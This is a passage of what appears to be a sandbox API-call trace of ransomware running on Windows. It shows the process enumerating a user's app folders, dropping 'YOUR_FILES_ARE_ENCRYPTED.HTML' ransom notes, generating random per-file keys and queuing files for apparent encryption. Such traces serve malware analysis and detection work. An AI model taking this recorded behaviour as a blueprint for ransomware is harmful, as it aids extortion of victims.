returned 0x0 [0116.129] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\LocalState") returned 93 [0116.129] GetProcessHeap () returned 0x600000 [0116.129] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0116.130] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\LocalState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\LocalState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\LocalState" [0116.130] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\LocalState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\LocalState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\LocalState\\*" [0116.130] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\LocalState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf41af75f, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0x1af1c04d, ftLastAccessTime.dwHighDateTime=0x1d70505, ftLastWriteTime.dwLowDateTime=0x1af1c04d, ftLastWriteTime.dwHighDateTime=0x1d70505, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ef06, dwReserved1=0x62ee60, cFileName=".", cAlternateFileName="")) returned 0x626638 [0116.130] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf41af75f, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0x1af1c04d, ftLastAccessTime.dwHighDateTime=0x1d70505, ftLastWriteTime.dwLowDateTime=0x1af1c04d, ftLastWriteTime.dwHighDateTime=0x1d70505, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ef06, dwReserved1=0x62ee60, cFileName="..", cAlternateFileName="")) returned 1 [0116.130] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1af1c04d, ftCreationTime.dwHighDateTime=0x1d70505, ftLastAccessTime.dwLowDateTime=0x1af1c04d, ftLastAccessTime.dwHighDateTime=0x1d70505, ftLastWriteTime.dwLowDateTime=0x1af42386, ftLastWriteTime.dwHighDateTime=0x1d70505, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ef06, dwReserved1=0x62ee60, cFileName="DataRv", cAlternateFileName="")) returned 1 [0116.130] StrStrIW (lpFirst="DataRv", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.130] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\LocalState\\DataRv") returned 100 [0116.130] GetProcessHeap () returned 0x600000 [0116.130] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0116.132] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\LocalState\\DataRv" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\LocalState\\DataRv") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\LocalState\\DataRv" [0116.132] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\LocalState\\DataRv", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\LocalState\\DataRv\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\LocalState\\DataRv\\*" [0116.132] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\LocalState\\DataRv\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1af1c04d, ftCreationTime.dwHighDateTime=0x1d70505, ftLastAccessTime.dwLowDateTime=0x1af1c04d, ftLastAccessTime.dwHighDateTime=0x1d70505, ftLastWriteTime.dwLowDateTime=0x1af42386, ftLastWriteTime.dwHighDateTime=0x1d70505, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x62ee68, cFileName=".", cAlternateFileName="")) returned 0x626778 [0116.132] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1af1c04d, ftCreationTime.dwHighDateTime=0x1d70505, ftLastAccessTime.dwLowDateTime=0x1af1c04d, ftLastAccessTime.dwHighDateTime=0x1d70505, ftLastWriteTime.dwLowDateTime=0x1af42386, ftLastWriteTime.dwHighDateTime=0x1d70505, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x62ee68, cFileName="..", cAlternateFileName="")) returned 1 [0116.132] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1af1c04d, ftCreationTime.dwHighDateTime=0x1d70505, ftLastAccessTime.dwLowDateTime=0x1af1c04d, ftLastAccessTime.dwHighDateTime=0x1d70505, ftLastWriteTime.dwLowDateTime=0x91512656, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x200818, dwReserved0=0x63d090, dwReserved1=0x62ee68, cFileName="offline-storage-ecs.data", cAlternateFileName="OFFLIN~1.DAT")) returned 1 [0116.132] StrStrIW (lpFirst="offline-storage-ecs.data", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.132] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\LocalState\\DataRv\\offline-storage-ecs.data") returned 125 [0116.132] PathFindExtensionW (pszPath="offline-storage-ecs.data") returned=".data" [0116.132] lstrlenW (lpString=".data") returned 5 [0116.132] PathFindExtensionW (pszPath="offline-storage-ecs.data") returned=".data" [0116.132] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1af42386, ftCreationTime.dwHighDateTime=0x1d70505, ftLastAccessTime.dwLowDateTime=0x1af42386, ftLastAccessTime.dwHighDateTime=0x1d70505, ftLastWriteTime.dwLowDateTime=0x25ab5b6c, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x300c18, dwReserved0=0x63d090, dwReserved1=0x62ee68, cFileName="offline-storage.data", cAlternateFileName="OFFLIN~2.DAT")) returned 1 [0116.132] StrStrIW (lpFirst="offline-storage.data", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.132] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\LocalState\\DataRv\\offline-storage.data") returned 121 [0116.132] PathFindExtensionW (pszPath="offline-storage.data") returned=".data" [0116.133] lstrlenW (lpString=".data") returned 5 [0116.133] PathFindExtensionW (pszPath="offline-storage.data") returned=".data" [0116.133] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1af42386, ftCreationTime.dwHighDateTime=0x1d70505, ftLastAccessTime.dwLowDateTime=0x1af42386, ftLastAccessTime.dwHighDateTime=0x1d70505, ftLastWriteTime.dwLowDateTime=0x25ab5b6c, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x300c18, dwReserved0=0x63d090, dwReserved1=0x62ee68, cFileName="offline-storage.data", cAlternateFileName="OFFLIN~2.DAT")) returned 0 [0116.133] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0116.133] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\LocalState\\DataRv\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 130 [0116.133] GetProcessHeap () returned 0x600000 [0116.133] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.134] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\LocalState\\DataRv\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.messaging_8wekyb3d8bbwe\\localstate\\datarv\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0116.136] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0116.138] CloseHandle (hObject=0x32c) returned 1 [0116.138] GetProcessHeap () returned 0x600000 [0116.138] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.138] GetProcessHeap () returned 0x600000 [0116.138] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0116.138] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x25c6b39b, ftCreationTime.dwHighDateTime=0x1d70504, ftLastAccessTime.dwLowDateTime=0x25c6b39b, ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x25c6b39b, ftLastWriteTime.dwHighDateTime=0x1d70504, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ef06, dwReserved1=0x62ee60, cFileName="RootTools", cAlternateFileName="ROOTTO~1")) returned 1 [0116.138] StrStrIW (lpFirst="RootTools", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.138] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\LocalState\\RootTools") returned 103 [0116.138] GetProcessHeap () returned 0x600000 [0116.138] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0116.138] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\LocalState\\RootTools" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\LocalState\\RootTools") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\LocalState\\RootTools" [0116.138] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\LocalState\\RootTools", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\LocalState\\RootTools\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\LocalState\\RootTools\\*" [0116.139] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\LocalState\\RootTools\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x25c6b39b, ftCreationTime.dwHighDateTime=0x1d70504, ftLastAccessTime.dwLowDateTime=0x25c6b39b, ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x25c6b39b, ftLastWriteTime.dwHighDateTime=0x1d70504, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x62ee68, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0116.139] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x25c6b39b, ftCreationTime.dwHighDateTime=0x1d70504, ftLastAccessTime.dwLowDateTime=0x25c6b39b, ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x25c6b39b, ftLastWriteTime.dwHighDateTime=0x1d70504, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x62ee68, cFileName="..", cAlternateFileName="")) returned 1 [0116.139] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25c6b39b, ftCreationTime.dwHighDateTime=0x1d70504, ftLastAccessTime.dwLowDateTime=0x25c6b39b, ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x261a25ce, ftLastWriteTime.dwHighDateTime=0x1d70504, nFileSizeHigh=0x0, nFileSizeLow=0x4b, dwReserved0=0x63d090, dwReserved1=0x62ee68, cFileName="roottools.conf", cAlternateFileName="ROOTTO~1.CON")) returned 1 [0116.139] StrStrIW (lpFirst="roottools.conf", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.139] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\LocalState\\RootTools\\roottools.conf") returned 118 [0116.139] PathFindExtensionW (pszPath="roottools.conf") returned=".conf" [0116.139] lstrlenW (lpString=".conf") returned 5 [0116.139] PathFindExtensionW (pszPath="roottools.conf") returned=".conf" [0116.139] SystemFunction036 (in: RandomBuffer=0x19de58, RandomBufferLength=0x20 | out: RandomBuffer=0x19de58) returned 1 [0116.139] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\LocalState\\RootTools\\roottools.conf" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.messaging_8wekyb3d8bbwe\\localstate\\roottools\\roottools.conf"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0116.140] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19de7c | out: lpFileSize=0x19de7c*=75) returned 1 [0116.140] CloseHandle (hObject=0x31c) returned 1 [0116.140] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25c6b39b, ftCreationTime.dwHighDateTime=0x1d70504, ftLastAccessTime.dwLowDateTime=0x25c6b39b, ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x261a25ce, ftLastWriteTime.dwHighDateTime=0x1d70504, nFileSizeHigh=0x0, nFileSizeLow=0x4b, dwReserved0=0x63d090, dwReserved1=0x62ee68, cFileName="roottools.conf", cAlternateFileName="ROOTTO~1.CON")) returned 0 [0116.140] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0116.140] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\LocalState\\RootTools\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 133 [0116.140] GetProcessHeap () returned 0x600000 [0116.140] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.140] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\LocalState\\RootTools\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.messaging_8wekyb3d8bbwe\\localstate\\roottools\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0116.141] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0116.142] CloseHandle (hObject=0x32c) returned 1 [0116.142] GetProcessHeap () returned 0x600000 [0116.142] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.142] GetProcessHeap () returned 0x600000 [0116.142] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0116.142] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27121c88, ftCreationTime.dwHighDateTime=0x1d70504, ftLastAccessTime.dwLowDateTime=0x27121c88, ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x27121c88, ftLastWriteTime.dwHighDateTime=0x1d70504, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ef06, dwReserved1=0x62ee60, cFileName="shared.lck", cAlternateFileName="")) returned 1 [0116.142] StrStrIW (lpFirst="shared.lck", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.142] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\LocalState\\shared.lck") returned 104 [0116.142] PathFindExtensionW (pszPath="shared.lck") returned=".lck" [0116.142] lstrlenW (lpString=".lck") returned 4 [0116.142] PathFindExtensionW (pszPath="shared.lck") returned=".lck" [0116.142] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2748effe, ftCreationTime.dwHighDateTime=0x1d70504, ftLastAccessTime.dwLowDateTime=0x2748effe, ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x2005f464, ftLastWriteTime.dwHighDateTime=0x1d70505, nFileSizeHigh=0x0, nFileSizeLow=0x8c4, dwReserved0=0x62ef06, dwReserved1=0x62ee60, cFileName="shared.xml", cAlternateFileName="")) returned 1 [0116.142] StrStrIW (lpFirst="shared.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.143] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\LocalState\\shared.xml") returned 104 [0116.143] PathFindExtensionW (pszPath="shared.xml") returned=".xml" [0116.143] lstrlenW (lpString=".xml") returned 4 [0116.143] PathFindExtensionW (pszPath="shared.xml") returned=".xml" [0116.143] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0116.143] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\LocalState\\shared.xml" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.messaging_8wekyb3d8bbwe\\localstate\\shared.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0116.143] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=2244) returned 1 [0116.143] GetProcessHeap () returned 0x600000 [0116.143] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30f2fc0 [0116.146] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="F4") returned 2 [0116.146] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="E3") returned 2 [0116.146] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="A3") returned 2 [0116.146] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="97") returned 2 [0116.146] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="4D") returned 2 [0116.146] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="6E") returned 2 [0116.146] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="93") returned 2 [0116.146] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="58") returned 2 [0116.146] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="E3") returned 2 [0116.146] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="7C") returned 2 [0116.146] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="A2") returned 2 [0116.146] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="94") returned 2 [0116.146] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="06") returned 2 [0116.146] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="7B") returned 2 [0116.146] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="4B") returned 2 [0116.146] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="87") returned 2 [0116.146] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="49") returned 2 [0116.146] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="32") returned 2 [0116.146] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="BC") returned 2 [0116.146] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="73") returned 2 [0116.146] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="CC") returned 2 [0116.147] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="44") returned 2 [0116.147] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="CA") returned 2 [0116.147] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="B2") returned 2 [0116.147] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="F2") returned 2 [0116.147] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="6D") returned 2 [0116.147] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="1A") returned 2 [0116.147] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="E0") returned 2 [0116.147] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="45") returned 2 [0116.147] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="74") returned 2 [0116.147] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="37") returned 2 [0116.147] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="23") returned 2 [0116.148] lstrcpyW (in: lpString1=0x3103074, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\LocalState\\shared.xml" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\LocalState\\shared.xml") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\LocalState\\shared.xml" [0116.148] CreateIoCompletionPort (FileHandle=0x32c, ExistingCompletionPort=0x274, CompletionKey=0x30f2fc0, NumberOfConcurrentThreads=0x0) returned 0x274 [0116.148] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30f2fc0, lpOverlapped=0x30f2fc0) returned 1 [0116.148] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43a6a07, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x43a6a07, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x7c4690c, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x31, dwReserved0=0x62ef06, dwReserved1=0x62ee60, cFileName="update.log", cAlternateFileName="")) returned 1 [0116.148] StrStrIW (lpFirst="update.log", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.148] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\LocalState\\update.log") returned 104 [0116.148] PathFindExtensionW (pszPath="update.log") returned=".log" [0116.148] lstrlenW (lpString=".log") returned 4 [0116.148] PathFindExtensionW (pszPath="update.log") returned=".log" [0116.148] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0116.148] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\LocalState\\update.log" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.messaging_8wekyb3d8bbwe\\localstate\\update.log"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0116.149] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=49) returned 1 [0116.149] CloseHandle (hObject=0x31c) returned 1 [0116.149] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43a6a07, 